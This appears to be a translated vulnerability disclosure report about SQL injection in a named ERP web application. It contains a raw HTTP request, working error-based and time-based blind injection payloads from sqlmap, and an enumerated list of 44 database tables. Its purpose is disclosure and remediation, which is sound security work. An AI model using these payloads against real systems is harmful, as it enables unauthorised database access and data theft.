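2015-12-13: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public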
POST /report_boss.php?action=save&type=month HTTP/1.1
Content-Length: 340
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=cl0o5bu4m5cjjcl5hjloaqonq2
Host: e.csztv.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sday=111&staff=yaolin
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sday (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: sday=111') AND (SELECT 2231 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(2231=2231,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rqsa'='rqsa&staff=yaolin

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sday=111') AND (SELECT * FROM (SELECT(SLEEP(5)))SyXN) AND ('GBjD'='GBjD&staff=yaolin
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: weberp
[44 tables]
+----------------------+
| twms_backup          |
| twms_guest           |
| twms_instore_main    |
| twms_instore_sub     |
| twms_log             |
| twms_notice          |
| twms_outstore_main   |
| twms_outstore_sub    |
| twms_prod_cate       |
| twms_product         |
| twms_store           |
| twms_user            |
| viooma_accounts      |
| viooma_area          |
| viooma_bank          |
| viooma_basic         |
| viooma_boss          |
| viooma_categories    |
| viooma_config        |
| viooma_dw            |
| viooma_flink         |
| viooma_group         |
| viooma_guest         |
| viooma_gys           |
| viooma_kc            |
| viooma_kcbackgys     |
| viooma_lab           |
| viooma_mainkc        |
| viooma_menu          |
| viooma_none          |
| viooma_part          |
| viooma_pay           |
| viooma_recordline    |
| viooma_reportbackgys |
| viooma_reportnone    |
| viooma_reportrk      |
| viooma_reportsale    |
| viooma_reportsback   |
| viooma_reportswitch  |
| viooma_sale          |
| viooma_saleback      |
| viooma_staff         |
| viooma_switch        |
| viooma_usertype      |
+----------------------+
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-12-14 20:21
Basically abandoned
None yet